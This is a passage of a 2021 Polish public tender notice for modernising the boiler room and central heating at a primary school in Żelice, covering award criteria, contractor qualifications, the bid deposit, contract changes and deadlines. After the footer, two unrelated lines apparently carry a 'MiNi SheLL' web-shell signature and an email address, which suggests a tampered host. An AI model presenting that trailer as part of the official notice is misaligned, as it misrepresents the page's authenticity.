realizacji<br/>zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty Zamawiający będzie kierował się kryteriami,<br/>wagami tych kryteriów oraz sposobem oceny ofert:<br/>Kryterium nr 1 - Cena wykonania zamówienia - waga kryterium 60%<br/>Oferta z najniższą ceną uzyska 60 punktów.<br/>Sposób oceny ofert w kryterium cena:<br/>Cenę najniższą dzielimy przez cenę badaną x 60% x 100 punktów = Punkty uzyskane przez ofertę<br/>badaną<br/>Uzyskana z wyliczenia ilość punktów zostanie ustalona z dokładnością do dwóch miejsc po przecinku<br/>z zachowaniem zasady zaokrągleń matematycznych.<br/>Kryterium nr 2 - Okres gwarancji – waga kryterium 40%. Oferta z najdłuższym okresem gwarancji<br/>uzyska 40 punktów.<br/>Sposób oceny ofert w kryterium okres gwarancji:<br/>Okres gwarancji badanej oferty dzielimy przez najdłuższy okres gwarancji spośród złożonych ofert x<br/>40% x 100 punktów = Punkty uzyskane przez ofertę badaną.<br/>Uzyskana z wyliczenia ilość punktów zostanie ustalona z dokładnością do dwóch miejsc po przecinku<br/>z zachowaniem zasady zaokrągleń matematycznych. Ważne regulacje - wymagania w zakresie kryterium nr 2:<br/>1) okres gwarancji musi być wyrażony w pełnych miesiącach,<br/>2) minimalny okres gwarancji wynosi 60 miesięcy,<br/>3) maksymalny okres gwarancji podlegający ocenie wynosi 96 miesięcy,<br/>4) okres gwarancji dotyczy również wszelkich zamontowanych i wbudowanych urządzeń,<br/>5) w przypadku braku podania przez Wykonawcę w ofercie terminu okresu gwarancji uznaje się, że<br/>Wykonawca zaoferował minimalny termin okresu gwarancji tj. 60 miesięcy i taki termin zostanie<br/>uwzględniony w umowie z Wykonawcą,<br/>6) jeżeli wykonawca zaproponuje termin gwarancji dłuższy niż 96 miesięcy, do oceny ofert w kryterium<br/>„okres gwarancji” zostanie przyjęty okres 96 miesięcy; z kolei w umowie z Wykonawcą zostanie<br/>uwzględniony termin gwarancji wskazany w ofercie Wykonawcy,<br/>7) jeżeli Wykonawca zaproponuje termin gwarancji krótszy niż 60 miesięcy, oferta Wykonawcy<br/>zostanie odrzucona jako niezgodna z SWZ.<br/>8) W okresie gwarancji Wykonawca zapewni serwis i konserwację wszystkich zamontowanych<br/>urządzeń. Wykonawca nie może warunkować udzielenia gwarancji od wykonania przez<br/>Zamawiającego płatnych: konserwacji, przeglądów itp. Wykonawca zobowiązuje się je wykonać<br/>bezpłatnie w ramach udzielonej gwarancji.<br/>2. Za najkorzystniejszą zostanie wybrana oferta, która uzyskała najwyższą ocenę tj. ilość punktów<br/>wyliczoną w następujący sposób:<br/>Łączna liczba punktów przyznana badanej ofercie = Ilość punktów przyznanych danej ofercie w<br/>kryterium ,,cena” + Ilość punktów przyznanych danej ofercie w kryterium ,,okres gwarancji”.<br/>3. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert uzyska taką<br/>samą ocenę tj. tyle samo punktów w łącznej punktacji, Zamawiający wybierze ofertę spośród tych ofert,<br/>która otrzymała najwyższą ocenę w kryterium o najwyższej wadze tj. w kryterium nr 1 "Cena".<br/>4. Jeżeli oferty otrzymają taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybiera<br/>ofertę z najniższą ceną.<br/>5. Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w punkcie 4, Zamawiający wezwie Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego<br/>ofert dodatkowych zawierających nową cenę.<br/>6. Wykonawcy, składając oferty dodatkowe, nie mogą oferować ceny wyższej niż zaoferowane w<br/>uprzednio złożonych przez nich ofertach.<br/>7. Zamawiający wybiera ofertę najkorzystniejszą w terminie związania ofertą - określonym w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienie mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu określone przez Zamawiającego, dotyczące:<br/>1) sytuacji ekonomicznej i finansowej: tj. posiadają środki finansowe lub zdolność kredytową w<br/>wysokości nie mniejszej niż 300 000,00 zł.<br/>W przypadku, gdy wartość ww. warunku wyrażona będzie w walucie obcej Zamawiający<br/>przeliczy wartość na walutę polską w oparciu o średni kurs walut NBP, dla danej waluty, z daty<br/>wszczęcia postępowania (ogłoszenie niniejszego postępowania). Jeżeli w tym nie będzie<br/>opublikowany średni kurs NBP, Zamawiający przyjmie kurs średni z ostatniej tabeli przed<br/>wszczęciem postępowania).<br/>2) zdolności technicznej lub zawodowej tj.:<br/>a) Wykonawcy muszą wykazać i udokumentować, że nie wcześniej niż w okresie ostatnich<br/>pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wykonali należycie, 1 zamówienie polegające na budowie/przebudowie<br/>kotłowni obejmującej wymianę źródła ciepła o wartości tych prac minimum 300 000,00 zł NETTO<br/>oraz 1 zamówienie polegające na wykonaniu instalacji centralnego ogrzewania o wartości tych<br/>prac minimum 150 000,00 zł NETTO.<br/>W przypadku, gdy wartość robót wskazanych przez Wykonawcę wyrażona będzie w walucie<br/>obcej, Zamawiający przeliczy wartość na walutę polską w oparciu o średni kurs walut NBP, dla<br/>danej waluty, z daty wszczęcia postępowania (ogłoszenia niniejszego postępowania). Jeżeli w<br/>tym dniu nie będzie opublikowany średni kurs NBP, Zamawiający przyjmie kurs średni z<br/>ostatniej tabeli przed wszczęciem postępowania).<br/>b) dysponują osobami odpowiedzialnymi za kierowanie robotami budowlanymi – zapewnią<br/>nadzór nad robotami w postaci: kierownika budowy, kierownika robót sanitarnych i kierownika robót elektrycznych, posiadających uprawnienia do wykonywania samodzielnych funkcji<br/>technicznych w budownictwie o specjalności odpowiadającej przedmiotowi zamówienia<br/>(konstrukcyjno-budowlanej, instalacji sanitarnych i instalacji elektrycznych).<br/>Zamawiający będzie uznawał uprawnienia równoważne wydane na podstawie wcześniej<br/>obowiązujących przepisów, a także będzie uznawał kwalifikacje zawodowe nabyte w drodze<br/>odpowiedniej procedury w odniesieniu do podmiotów będących obywatelami państw<br/>członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich<br/>Europejskiego Porozumienia o Wolnym Handlu (EFTA) - stron umowy o Europejskim Obszarze<br/>Gospodarczym, którzy nabyli prawo do wykonywania określonych zawodów regulowanych lub<br/>określonych działalności, jeżeli te kwalifikacje zostały uznane na zasadach przewidzianych w<br/>Ustawie z 22.12.2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach<br/>członkowskich Unii Europejskiej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu,<br/>Zamawiający żąda oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o<br/>którym mowa w Art.125 ust.1 ustawy, w zakresie podstaw wykluczenia z postępowania w zakresie<br/>wskazanym przez Zamawiającego - wg wzoru stanowiącego Załącznika nr 3 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. W celu potwierdzenia spełnienia przez Wykonawcę warunków udziału w<br/>postępowaniu dotyczących sytuacji ekonomicznej lub finansowej Zamawiający żąda - informacji banku<br/>lub spółdzielczej kasy oszczędnościowo - kredytowej potwierdzającej wysokość posiadanych środków<br/>finansowych lub zdolność kredytową Wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej<br/>złożeniem.<br/>Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć wymaganych przez Zamawiającego<br/>podmiotowych środków dowodowych w zakresie sytuacji ekonomicznej lub finansowej, Wykonawca<br/>może złożyć inne podmiotowe środki dowodowe, które w wystarczający sposób potwierdzą spełnienie<br/>opisanego przez Zamawiającego warunku udziału w postępowaniu w wymaganym zakresie.<br/>2. W celu potwierdzenia spełnienia przez Wykonawcę warunków udziału w postępowaniu dotyczących<br/>zdolności technicznej lub zawodowej, Zamawiający żąda następujących podmiotowych środków<br/>dowodowych:<br/>1) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca<br/>wykonania, oraz podmiotów, na rzecz których te roboty zostały wykonane oraz załączeniem dowodów<br/>określających, czy te roboty zostały wykonane należycie, przy czym dowodami są referencje bądź inne<br/>dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli<br/>Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne<br/>odpowiednie dokumenty. Wzór wykazu robót stanowi Załącznik nr 4 do SWZ .<br/>2) wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat<br/>ich kwalifikacji zawodowych, uprawnień, niezbędnych do wykonania zamówienia publicznego, a także<br/>zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi<br/>osobami. Wzór wykazu osób stanowi Załącznik nr 5 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz oferty wg wzoru stanowiącego Załącznik nr 1 do SWZ. Formularz musi być złożony<br/>w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym osoby upoważnionej do reprezentowania Wykonawcy, zgodnie z formą<br/>reprezentacji określoną w rejestrze lub innym dokumencie właściwym dla danej formy<br/>organizacyjnej Wykonawcy albo przez umocowanego przedstawiciela Wykonawcy.<br/>2. Odpis lub informację z KRS, CEiIDG lub innego właściwego rejestru w celu potwierdzenia, że<br/>osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w pkt 2 jeżeli<br/>Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile<br/>Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.<br/>3. Pełnomocnictwo lub inny dokument - jeśli w imieniu Wykonawcy działa osoba, której<br/>umocowanie nie wynika z dokumentów rejestrowych, o których mowa w punkcie 2.<br/>Powyższe uregulowanie stosuje się odpowiednio do osoby działającej w imieniu Wykonawców<br/>wspólnie ubiegających sie o udzielenia zamówienia publicznego. Pełnomocnictwo w takim<br/>przypadku powinno zawierać: nazwę postępowania o udzielenie zamówienia, Nazwy i adresy<br/>wszystkich Wykonawców, ustanowienie pełnomocnika oraz jego umocowanie.<br/>4. Zobowiązanie podmiotu udostępniającego zasoby, lub inny podmiotowy środek dowodowy (o<br/>ile dotyczy) potwierdzający, że stosunek łączący Wykonawcę z podmiotami udostępniającymi<br/>zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/>1) zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby,<br/>2) sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu<br/>udostępniającego te zasoby przy wykonywaniu zamówienia,<br/>3) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca<br/>polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których<br/>wskazane zdolności dotyczą.<br/>Wzór zobowiązania stanowi Załącznik nr 7 do SWZ.<br/>Zobowiązanie należy złożyć w formie elektronicznej lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym, lub podpisem osobistym osoby upoważnionej do reprezentowania<br/>podmiotu lub jego pełnomocnika. 5. Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, których<br/>wykonanie zamierza powierzyć Podwykonawcom, oraz podania nazw ewentualnych<br/>podwykonawców, jeżeli są już znani - wg wzoru stanowiącego Załącznikiem nr 6 do SWZ.<br/>Informację należy złożyć w formie elektronicznej lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym, lub podpisem osobistym osoby upoważnionej do reprezentowania<br/>podmiotu lub jego pełnomocnika.<br/>6. Kosztorys ofertowy - wydruk uproszczony kosztorysu z podaniem cen jednostkowych<br/>wykonania robót oraz informacją o zastosowanych stawkach czynników produkcji<br/>(roboczogodzinie, kosztach zakupu, kosztach pośrednich i zysku). Cenę jednostkową należy<br/>podać z zaokrągleniem do dwóch miejsc po przecinku. Ponadto podczas sporządzania<br/>kosztorysu ofertowego należy sprawdzić czy stosowana formuła : ilość x cena jest równa<br/>wartości danej pozycji kosztorysowej.<br/>7. Wadium - zgodnie z wymaganiami w punkcie XXIII SWZ.<br/>8. Zastrzeżenie tajemnicy przedsiębiorstwa (jeśli dotyczy) - w sytuacji gdy oferta lub inne<br/>dokumenty będą zawierały tajemnicę przedsiębiorstwa, Wykonawca, wraz z przekazaniem<br/>takich informacji zastrzega, że nie mogą być one udostępniane, oraz wykazuje, że zastrzeżone<br/>informacje stanowią tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16<br/>kwietnia 1993r.o zwalczaniu nieuczciwej konkurencji.<br/>Dokument musi być złożony w formie elektronicznej lub postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym osoby upoważnionej do reprezentowania<br/>Wykonawcy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest do wniesienia wadium w wysokości 8 000,00 zł (słownie: osiem tysięcy złotych).<br/>2. Wadium należy wnieść przed upływem terminu składania ofert i utrzymać nieprzerwanie do<br/>dnia upływu terminu związania ofertą (tj. do dnia 12.08.2021r.), z wyjątkiem przypadków o<br/>których mowa w art.98 ust.1 pkt 2 i 3 oraz ust.2.<br/>3. Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem<br/>okresu ważności wadium na przedłużony okres związania ofertą.<br/>4. Wadium może być wnoszone wg wyboru Wykonawcy w jednej lub kilku następujących<br/>formach:<br/>a) pieniądzu;<br/>b) gwarancjach bankowych;<br/>c) gwarancjach ubezpieczeniowych;<br/>d) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z 9<br/>listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>5. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy<br/>Zamawiającego w PKO Bank Polski SA z dopiskiem:<br/>Wadium – ,,Modernizacja kotłowni i instalacji centralnego ogrzewania w Szkole Podstawowej w<br/>Żelicach” - Nr rachunku: 59 1020 4027 0000 1302 1215 5067.<br/>6. Wadium wniesione w formie gwarancji lub poręczenia, należy załączyć w oryginale w postaci<br/>dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez<br/>wystawcę dokumentu i powinno obejmować odpowiedzialność za wszystkie przypadki<br/>powodujące jego utratę przez Wykonawcę określone w art. 98 ust.6 ustawy Pzp.<br/>7. Wniesienie wadium w pieniądzu będzie skuteczne jeśli w podanym terminie rachunek<br/>bankowy Zamawiającego zostanie uznany pełną kwotą wymaganego wadium. 8. Treść poręczenia lub gwarancji wadialnej musi zawierać w szczególności następujące<br/>elementy:<br/>1) nazwę i adres Zamawiającego,<br/>2) nazwę zamówienia,<br/>3) nazwę i adres Wykonawcy,<br/>4) termin ważności gwarancji/poręczenia,<br/>5) określenie wierzytelności, która ma być zabezpieczona gwarancją/ poręczeniem,<br/>6) z treści gwarancji powinno wynikać bezwarunkowe i nieodwołalne zobowiązanie Gwaranta do<br/>wypłaty Zamawiającemu pełnej kwoty wadium na każde pisemne żądanie w okolicznościach<br/>określonych w art.98 ust.6 ustawy Pzp.<br/>10. Zamawiający dokona zwrotu wadium, w przypadkach, terminach i na zasadach określonych<br/>w Art.98 ust 1 - 5 ustawy Pzp.<br/>11. Zamawiający zatrzymuje wadium wraz z odsetkami, a w przypadku wadium wniesionego w<br/>formie gwarancji lub poręczenia, występuje odpowiednio do gwaranta lub poręczyciela z<br/>żądaniem zapłaty wadium jeżeli zajdą okoliczności wymienione w Art.98 ust.6 ustaw Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że:<br/>a) wspólnie spełnią warunki udziału w postępowaniu<br/>b) w stosunku do żadnego z nich nie zachodzą podstawy wykluczenia z postępowania na<br/>podstawie art.108 ust.1<br/>c) Wykonawcy wspólnie ubiegający się o zamówienie ponoszą solidarną odpowiedzialność za<br/>niewykonanie lub nienależyte wykonanie zobowiązania.<br/>2) Wykonawcy wspólnie ubiegający sie o realizacje zamówienia muszą ustanowić pełnomocnika<br/>do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3) jeśli wybrana zostanie oferta wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, zamawiający żąda przed zawarciem umowy kopię umowy regulującej współpracę tych wykonawców.<br/>4) Każdy z Wykonawców wspólnie ubiegający się o udzielenie zamówienia składa Oświadczenie<br/>potwierdzające brak podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu w<br/>zakresie, w jakim każdy z Wykonawców wykazuje spełnienie warunków udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Przewidywane zmiany na podstawie art.455 ust.1 pkt 1 w następujących przypadkach:<br/>- zmiana terminu realizacji umowy w przypadku:<br/>1) konieczności udzielenia zamówień nieobjętych niniejszą Umową, a których wykonanie będzie<br/>miało wpływ na wykonanie Umowy o zamówienie (w tym m.in. robót dodatkowych); pod<br/>warunkiem wykonania protokołu konieczności, z którego będzie wynikała<br/>konieczność/zasadność wykonania tych robót oraz wydłużenie terminu realizacji;<br/>2) siły wyższej rozumianej jako pożar, powódź, huragan, eksplozję, awarie energetyczne, wojnę,<br/>operacje wojskowe, rozruchy, niepokoje społeczne, ograniczenia i zakazy wydane przez organy<br/>administracji publicznej, epidemię, a także inne nadzwyczajne zjawiska losowe i przyrodnicze,<br/>wszystkie z nich pozostające poza kontrolą Stron, których nie można było przewidzieć w chwili<br/>zawarcia umowy, a jeżeli możliwe były do przewidzenia nie można było im zapobiec, pod<br/>warunkiem złożenia wniosku przez jedną ze stron lub sporządzeniem protokołu z udziałem<br/>uczestników procesu budowlanego; wniosek lub protokół powinien zawierać opis zaistniałej<br/>sytuacji, jej wpływ na realizację zamówienia oraz oświadczenia lub inne dokumenty<br/>potwierdzające zaistniałą sytuację;<br/>3) wstrzymania przez Zamawiającego lub organy administracji publicznej prac objętych Umową,<br/>w szczególności z powodu zagrożenia życia, zdrowia na budowie, pod warunkiem złożenia<br/>wniosku przez jedną ze stron lub sporządzeniem protokołu z udziałem uczestników procesu<br/>budowlanego; wniosek lub protokół powinien zawierać opis zaistniałej sytuacji, jej wpływ na<br/>termin realizacji zamówienia oraz ewentualne dowody (np. kopie decyzji administracyjnych),<br/>inne dokumenty potwierdzające zaistniałą sytuację;<br/>4) wystąpienia okoliczności, których strony nie były w stanie przewidzieć mimo zachowania<br/>należytej staranności, pod warunkiem złożenia wniosku przez jedną ze stron lub sporządzeniem<br/>protokołu z udziałem uczestników procesu budowlanego; wniosek lub protokół powinien<br/>zawierać opis zaistniałej sytuacji, jej wpływ na termin realizacji zamówienia oraz ewentualne<br/>dowody (np. kopie decyzji administracyjnych), inne dokumenty potwierdzające zaistniałą<br/>sytuację; 5) konieczności zapewnienia dłuższego terminu realizacji robót, wynikających z terminów dostaw<br/>materiałów lub urządzeń (w tym w związku z panującym stanem pandemii), pod warunkiem<br/>złożenia pisemnego wniosku przez Wykonawcę, udokumentowania go (np. poprzez<br/>przedstawienia kopii zamówień, zleceń, umów, informacji od dostawców); powyższa okoliczność<br/>powinna znaleźć odzwierciedlenie w protokole spisanym przez uczestników procesu<br/>budowlanego.<br/>6) Zmiana kierownika budowy (kierowników robót) i inspektora nadzoru – pod warunkiem<br/>złożenia pisemnego zawiadomienia jednej ze stron z uzasadnieniem i udokumentowaniem, że<br/>zaproponowany nowy kierownik budowy (robót) spełnia wymagania postawione w SWZ.<br/>7) Zmiana kwoty umownej - aneksem:<br/>a) w przypadku urzędowej zmiany podatku VAT pod warunkiem złożenia pisemnego wniosku<br/>przez Wykonawcę lub Zamawiającego. b) po rozliczeniu i zatwierdzeniu przez Zamawiającego robót budowlanych wykonanych (w<br/>związku z przyjętą formułą wynagrodzenia kosztorysowego) – w przypadku wystąpienia różnic<br/>między faktycznym zakresem wykonanych robót, a kosztorysem ofertowym sporządzonym na<br/>podstawie przedmiarów robót – dopuszcza się możliwość zmiany kwoty umownej do wysokości<br/>kosztorysu powykonawczego. Zamawiający warunkuje dokonanie zmian umowy w tym zakresie,<br/>bieżącym informowaniem Zamawiającego o występujących różnicach oraz sporządzeniem<br/>kosztorysu powykonawczego.<br/>2. Zmiany umowy na podstawie: 455 ust.1 punkt 2), 3), 4) i art. 455 ust. 2. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-14 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy złożyć na platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/ug_wagrowiec na stronie internetowej prowadzonego postępowania</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-14 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-12</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Na podstawie art. 95 ustawy Pzp Zamawiający wymaga zatrudnienia przez Wykonawcę lub podwykonawcę, na podstawie stosunku pracy osób wykonujących czynności w zakresie realizacji zamówienia t.j.:<br/>1)	wykonywanie robót ogólnobudowlanych i wykończeniowych: robót rozbiórkowych, murarskich, tynkarskich, malarskich, okładzinowych stolarskich i ślusarskich;<br/>2)	wykonywanie robót w zakresie instalacji sanitarnych: robót związanych z technologią i montażem wyposażenia kotłowni, instalacji wodociągowej, robót w zakresie instalacji centralnego ogrzewania,<br/>3)	wykonywanie robót w zakresie instalacji elektrycznych: instalacji zasilającej i oświetleniowej.<br/>2.	Sposób weryfikacji zatrudnienia tych osób:<br/>1)	w trakcie realizacji zamówienia, na każde wezwanie Zamawiającego, w wyznaczonym w tym wezwaniu terminie Wykonawca przedłoży Zamawiającemu: <br/>- oświadczenie o zatrudnieniu na podstawie umowy o pracę ww. osób. Oświadczenie to powinno zawierać w szczególności: dokładne określenie podmiotu składającego oświadczenie, datę złożenia oświadczenia, wskazanie, że objęte wezwaniem czynności wykonują osoby zatrudnione na podstawie umowy o pracę wraz ze wskazaniem liczby tych osób, imion i nazwisk, rodzaju umowy o pracę i wymiaru etatu oraz podpis osoby uprawnionej do złożenia oświadczenia w imieniu wykonawcy lub podwykonawcy;<br/>- poświadczoną za zgodność z oryginałem odpowiednio przez Wykonawcę lub Podwykonawcę kopię umowy/umów o pracę osób wykonujących w trakcie realizacji zamówienia czynności, których dotyczy ww. oświadczenie Wykonawcy lub Podwykonawcy (wraz z dokumentem regulującym zakres obowiązków, jeżeli został sporządzony). Kopia umowy/umów powinna zostać zanonimizowana w sposób zapewniający ochronę danych osobowych pracowników, zgodnie z przepisami RODO. Imię i nazwisko pracownika nie podlega anonimizacji. Informacje takie jak: data zawarcia umowy, rodzaj umowy o pracę, wymiar etatu, zakres obowiązków pracownika, powinny być możliwe do zidentyfikowania; <br/>- zaświadczenie właściwego oddziału ZUS, potwierdzające opłacanie przez Wykonawcę lub Podwykonawcę składek na ubezpieczenia społeczne i zdrowotne z tytułu zatrudnienia na podstawie umów o pracę za ostatni okres rozliczeniowy,<br/>- poświadczoną za zgodność z oryginałem odpowiednio przez Wykonawcę lub Podwykonawcę kopię dowodu potwierdzającego zgłoszenie pracownika przez pracodawcę do ubezpieczeń, zanonimizowaną w sposób zapewniający ochronę danych osobowych pracowników, zgodnie z przepisami ustawy o ochronie danych osobowych. Imię i nazwisko pracownika nie podlega anonimizacji.<br/><br/>3.	Uprawnienia Zamawiającego w zakresie kontroli spełnienia przez Wykonawcę wymagań związanych z zatrudnieniem tych osób oraz sankcji z tytułu nie spełnienia tych wymagań: <br/>1)	żądanie oświadczeń i dokumentów w zakresie potwierdzenia spełnienia ww. wymogów i dokonywania ich oceny (w tym oświadczenie Wykonawcy, Podwykonawcy lub pracownika),<br/>2)	żądanie wyjaśnień w przypadku wątpliwości w zakresie potwierdzenia spełnienia ww. wymogów,<br/>3)	przeprowadzenie kontroli na miejscu wykonywania świadczenia,<br/>4)	z tytułu niespełnienia przez Wykonawcę lub Podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę osób wykonujących wskazane w punkcie 1 czynności Zamawiający przewiduje sankcję w postaci obowiązku zapłaty przez Wykonawcę kary umownej w wysokości określonej w istotnych postanowieniach umowy/wzorze umowy w sprawie zamówienia publicznego. <br/>5)	niezłożenie przez Wykonawcę w wyznaczonym przez Zamawiającego terminie żądanych dowodów w celu potwierdzenia spełnienia przez Wykonawcę lub Podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę traktowane będzie jako niespełnienie przez Wykonawcę lub Podwykonawcę zatrudnienia na podstawie umowy o pracę osób wykonujących wskazane w punkcie 1 czynności,<br/>6)	w przypadku uzasadnionych wątpliwości co do przestrzegania Prawa pracy przez Wykonawcę lub Podwykonawcę, Zamawiający może zwrócić się o przeprowadzenie kontroli przez Państwową Inspekcję Pracy.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-28 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com